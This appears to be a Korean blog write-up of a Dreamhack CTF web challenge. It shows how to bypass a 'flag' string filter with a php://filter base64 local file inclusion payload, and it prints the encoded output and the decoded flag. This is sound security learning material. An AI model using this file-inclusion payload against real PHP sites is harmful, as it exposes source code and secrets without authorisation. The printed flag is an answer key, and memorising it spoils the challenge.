




flag 문자열을 필터링하여 접속할 수 없게 함



include 함수 구문을 보면 main.php를 GET 방식으로 불러온다는 것을 알 수 있음

flag.php 파일을 들어가보면 Permission denied 되어있음을 알 수 있음

hello.json을 접속하면 이러한 문자열을 볼 수 있음
앞에 flag 문자열을 필터링하여 접속할 수 없게 했다고 했는데
=> 우리는 답을 찾기 위해 flag 필터링을 우회하는 방법과 파일에 대한 filter 를 사용할 것임
http://host3.dreamhack.games:13646/?page=php://filter/convert.base64-encode/resource=/var/www/uploads/flag
http://host3.dreamhack.games:13646 <- 여기까진 자신이 접속했던 문제창의 정보
/?page=php://filter/convert.base64-encode/resource=/var/www/uploads/flag <- 이것을 추가로 입력해주면 됨

위의 사진과 같이 PD9waHAKCSRmbGFnID0gJ0RIe2JiOWRiMWYzMDNjYWNmMGYzYzkxZTBhYmNhMTIyMWZmfSc7Cj8+CmNhbiB5b3Ugc2VlICRmbGFnPw==
이라는 문자열이 출력되는데 이것은 인코딩된 값임
그러므로 우리는 디코딩을 해줘서 결과를 도출해내면 됨

즉, 답은 DH{bb9db1f303cacf0f3c91e0abca1221ff}라는 것을 알 수 있음
'인터루드' 카테고리의 다른 글
| proxy-1 (0) | 2022.11.13 |
|---|---|
| simple-ssti (0) | 2022.11.10 |
| file-download-1 (0) | 2022.11.06 |
| image-storage (0) | 2022.11.06 |
| web-ssrf (0) | 2022.11.06 |